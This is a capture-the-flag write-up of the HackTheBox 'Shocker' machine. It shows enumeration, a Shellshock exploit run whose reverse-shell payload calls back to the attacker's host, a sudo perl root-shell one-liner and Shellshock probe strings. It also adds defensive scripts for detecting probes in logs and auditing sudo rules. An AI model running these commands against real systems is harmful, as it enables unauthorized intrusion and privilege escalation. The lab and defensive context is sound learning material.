Disclaimer
The hosts penetrated in this article are legally authorized. The tools and methods used here are for learning and communication only. Do not use the tools or penetration ideas from this article for any illegal purpose. I am not responsible for any consequences arising from them, nor for any misuse or damage caused.
Service detection
┌──(root💀kali)-[~/HTB/Shocker]
└─# nmap -sV -Pn 10.10.10.56 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 01:58 EST
Nmap scan report for 10.10.10.56
Host is up (0.35s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1015.68 seconds
Port 80 serves a simple page.
Directory brute-forcing
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e * -t 100 -u http://10.10.10.56

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.10.56/_21-11-30_02-12-39.txt

Error Log: /root/dirsearch/logs/errors-21-11-30_02-12-39.log

Target: http://10.10.10.56/

[02:12:41] Starting:
[02:14:06] 200 -  137B  - /index.html
There is only one static page, which is a bit discouraging.
Let's try a bigger wordlist:
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.56 -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545

Output File: /root/dirsearch/reports/10.10.10.56/_21-11-30_02-18-19.txt

Error Log: /root/dirsearch/logs/errors-21-11-30_02-19-12.log

Target: http://10.10.10.56/

[02:19:12] Starting:
[02:31:53] 403 -  299B  - /cgi-bin/

Task Completed
Only the cgi-bin folder turns up, so we brute-force it with gobuster, specifying the .php, .sh and .html extensions:
└─# gobuster dir --url http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt -t 30 -x .php,.sh,.html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/cgi-bin/
[+] Method:                  GET
[+] Threads:                 30
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              sh,html,php
[+] Timeout:                 10s
===============================================================
2021/11/30 05:45:13 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd.html       (Status: 403) [Size: 308]
/.hta.php             (Status: 403) [Size: 302]
/.htaccess            (Status: 403) [Size: 303]
/.htpasswd            (Status: 403) [Size: 303]
/.hta.sh              (Status: 403) [Size: 301]
/.htaccess.php        (Status: 403) [Size: 307]
/.htaccess.sh         (Status: 403) [Size: 306]
/.hta.html            (Status: 403) [Size: 303]
/.htpasswd.php        (Status: 403) [Size: 307]
/.hta                 (Status: 403) [Size: 298]
/.htpasswd.sh         (Status: 403) [Size: 306]
/.htaccess.html       (Status: 403) [Size: 308]
/user.sh              (Status: 200) [Size: 118]
===============================================================
2021/11/30 05:48:46 Finished
===============================================================
A user.sh file was found.
The file cannot be viewed in a browser, but curl returns its contents:
┌──(root💀kali)-[~/HTB/Shocker]
└─# curl -s http://10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain

Just an uptime test script

 05:48:43 up  3:52,  0 users,  load average: 0.01, 0.03, 0.00
Use nikto to scan the script for potential vulnerabilities:
┌──(root💀kali)-[~/HTB/Shocker]
└─# nikto -h http://10.10.10.56/cgi-bin/user.sh
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.56
+ Target Hostname:    10.10.10.56
+ Target Port:        80
+ Start Time:         2021-11-30 05:53:13 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header '93e4r0-cve-2014-6271' found, with contents: true
+ Uncommon header '93e4r0-cve-2014-6278' found, with contents: true
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /cgi-bin/user.sh/kboard/: KBoard Forum 0.3.0 and prior have a security problem in forum_edit_post.php, forum_post.php and forum_reply.php
+ /cgi-bin/user.sh/lists/admin/: PHPList pre 2.6.4 contains a number of vulnerabilities including remote administrative access, harvesting user info and more. Default login to admin interface is admin/phplist
+ /cgi-bin/user.sh/splashAdmin.php: Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely.
+ /cgi-bin/user.sh/ssdefs/: Siteseed pre 1.4.2 has 'major' security problems.
+ /cgi-bin/user.sh/sshome/: Siteseed pre 1.4.2 has 'major' security problems.
+ /cgi-bin/user.sh/tiki/: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin
+ /cgi-bin/user.sh/tiki/tiki-install.php: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin
Version 2.4.18 appears to have the CVE-2014-6271 and CVE-2014-6278 (Shellshock) vulnerabilities.
We found an exploit script for it.
Copy the exploit to the local machine and run it:
python exp.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.15 lport=4242 pages="/cgi-bin/user.sh"
Getting the initial shell
┌──(root💀kali)-[~/HTB/Shocker]
└─# python exp.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.15 lport=462 pages="/cgi-bin/user.sh"
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.10.10.56
10.10.10.56> id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
10.10.10.56> whoami
shelly
user.txt is in the home directory.
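From the defender's side, the nikto findings and the exploit run above leave a trace that is easy to hunt for. A Shellshock probe reaches a CGI script through an HTTP header value that the web server exports into the script's environment, and the trigger for CVE-2014-6271 is a value beginning with a bash function definition, "() {". Apache's combined access log records two of those header values, User-Agent and Referer, so the check below scans access-log lines for that prefix. This is an added example, not code from the original article or from any tool it uses; the log lines are constructed for it and the helper names are my own.

```python
import re
from dataclasses import dataclass

# Apache "combined" log format. The sample lines below are constructed for this
# example; real Apache escapes embedded quotes in header values as \".
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The CVE-2014-6271 trigger: a header value that starts with a bash function
# definition. Whitespace between the tokens is optional, so allow it.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Only the User-Agent and Referer values reach the combined log. Probes placed
# in Cookie, Host or custom headers are exported to the CGI script all the
# same but never appear here, so log review is a partial view (see the note).
LOGGED_HEADERS = ("ua", "referer")

@dataclass
class Hit:
    ip: str
    path: str
    header: str
    value: str

def parse_combined(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None

def request_path(req):
    """'GET /cgi-bin/user.sh HTTP/1.1' -> '/cgi-bin/user.sh'."""
    parts = req.split(" ")
    return parts[1] if len(parts) >= 2 else req

def find_shellshock(lines):
    """Scan access-log lines and return one Hit per header value carrying the trigger."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue  # unparsable line: skipped rather than silently matched
        for header in LOGGED_HEADERS:
            if SHELLSHOCK_RE.search(rec[header]):
                hits.append(Hit(rec["ip"], request_path(rec["req"]), header, rec[header]))
    return hits

def hits_by_source(hits):
    """Count hits per client IP, the summary an analyst wants for triage."""
    counts = {}
    for h in hits:
        counts[h.ip] = counts.get(h.ip, 0) + 1
    return counts

# Constructed sample log: a plain curl of the script (as in the article), two
# probes carrying the trigger in different headers, an ordinary browser hit
# whose User-Agent contains parentheses but no trigger, and a corrupt line.
SAMPLE_LOG = [
    '10.10.14.15 - - [30/Nov/2021:05:48:43 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.74.0"',
    '10.10.14.15 - - [30/Nov/2021:05:53:20 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; echo; echo shellshock-probe"',
    '10.10.14.15 - - [30/Nov/2021:05:53:21 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "() { :;}; echo; echo shellshock-probe" "Mozilla/5.0"',
    '10.10.14.15 - - [30/Nov/2021:05:55:02 -0500] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/94.0"',
    'this line is not in combined format',
]

if __name__ == "__main__":
    found = find_shellshock(SAMPLE_LOG)
    for h in found:
        print(f"{h.ip} {h.path} {h.header}: {h.value}")
    print(hits_by_source(found))
```

Run against the sample it reports the two probe lines and nothing else. Two caveats matter in practice: the access log only shows probes sent in the two logged headers, so full coverage needs a sensor that sees the whole request (a mod_security rule on all header values, or a network IDS signature for the same prefix); and detection is not the fix. CVE-2014-6271 and CVE-2014-6278 are bugs in how bash imports exported functions, so the remediation is updating the bash package, after which the same probes still appear in the log but no longer execute anything.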
Privilege escalation
Checking the sudo privileges shows that perl can be run as root without a password:
10.10.10.56> sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
Use perl to get a root shell:
10.10.10.56> sudo perl -e 'exec "/bin/sh";'
10.10.10.56> id
uid=0(root) gid=0(root) groups=0(root)
10.10.10.56> whoami
root
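The sudoers rule that made this last step trivial, "(root) NOPASSWD: /usr/bin/perl", is the kind of entry an audit of sudo -l output should flag on sight: an interpreter run as root with a free argument list is a root shell, whatever the administrator intended. The script below is an added example, not part of the original article; it parses sudo -l output in the format shown above, classifies each command rule, and uses the article's own output plus two constructed rules as its input. The INTERPRETERS set is deliberately short and the Rule/Finding names are my own.

```python
import re
from dataclasses import dataclass
from os.path import basename

# One command rule of `sudo -l` output, e.g.
#   (root) NOPASSWD: /usr/bin/perl
#   (ALL : ALL) ALL
# Tags such as NOPASSWD: or SETENV: may precede the command.
SUDO_RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$"
)

# Interpreters and shells. Any of them run as root with an unrestricted
# argument list can execute arbitrary code, so the rule grants a root shell,
# not a limited privilege. (Assumption: a deliberately short list for this
# example; a production audit uses a much longer one.)
INTERPRETERS = {"perl", "python", "python2", "python3", "ruby", "sh", "bash", "dash", "zsh"}

@dataclass
class Rule:
    runas: str
    tags: frozenset
    command: str

@dataclass
class Finding:
    rule: Rule
    severity: str
    reason: str

def parse_sudo_l(text):
    """Extract the command rules from `sudo -l` output; the Defaults block is skipped."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = SUDO_RULE_RE.match(line) if in_rules else None
        if m:
            tags = frozenset(re.findall(r"[A-Z]+", m.group("tags")))
            rules.append(Rule(m.group("runas").strip(), tags, m.group("cmd").strip()))
    return rules

def audit(rules):
    """Classify each rule: ALL and unrestricted interpreters are high, argument-locked interpreters medium."""
    findings = []
    for r in rules:
        nopass = " without a password" if "NOPASSWD" in r.tags else ""
        if r.command == "ALL":
            findings.append(Finding(r, "high", f"any command as {r.runas}{nopass}"))
            continue
        path, _, args = r.command.partition(" ")
        prog = basename(path)
        if prog not in INTERPRETERS:
            continue  # outside this example's scope; a fuller audit checks other binaries too
        if not args:
            findings.append(Finding(r, "high",
                f"{prog} with any arguments is equivalent to a shell as {r.runas}{nopass}"))
        else:
            findings.append(Finding(r, "medium",
                f"argument-locked {prog}; safe only if {args} is root-owned and not writable by the user"))
    return findings

# The article's sudo -l output, followed by two constructed rules: the same
# interpreter locked to one script, and a non-interpreter command.
SAMPLE_SUDO_L = """\
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/perl /opt/uptime.pl
    (root) NOPASSWD: /usr/bin/systemctl status apache2
"""

if __name__ == "__main__":
    for f in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"[{f.severity}] ({f.rule.runas}) {f.rule.command}: {f.reason}")
```

On the article's rule the output is a single high finding; the constructed "/usr/bin/perl /opt/uptime.pl" rule is only medium because sudo then matches the exact argument list, and that protection holds only while /opt/uptime.pl (and the directory containing it) cannot be modified by the user the rule is granted to. The systemctl rule is not flagged because it falls outside the interpreter class this example covers, which is the main limitation to keep in mind when reading its results.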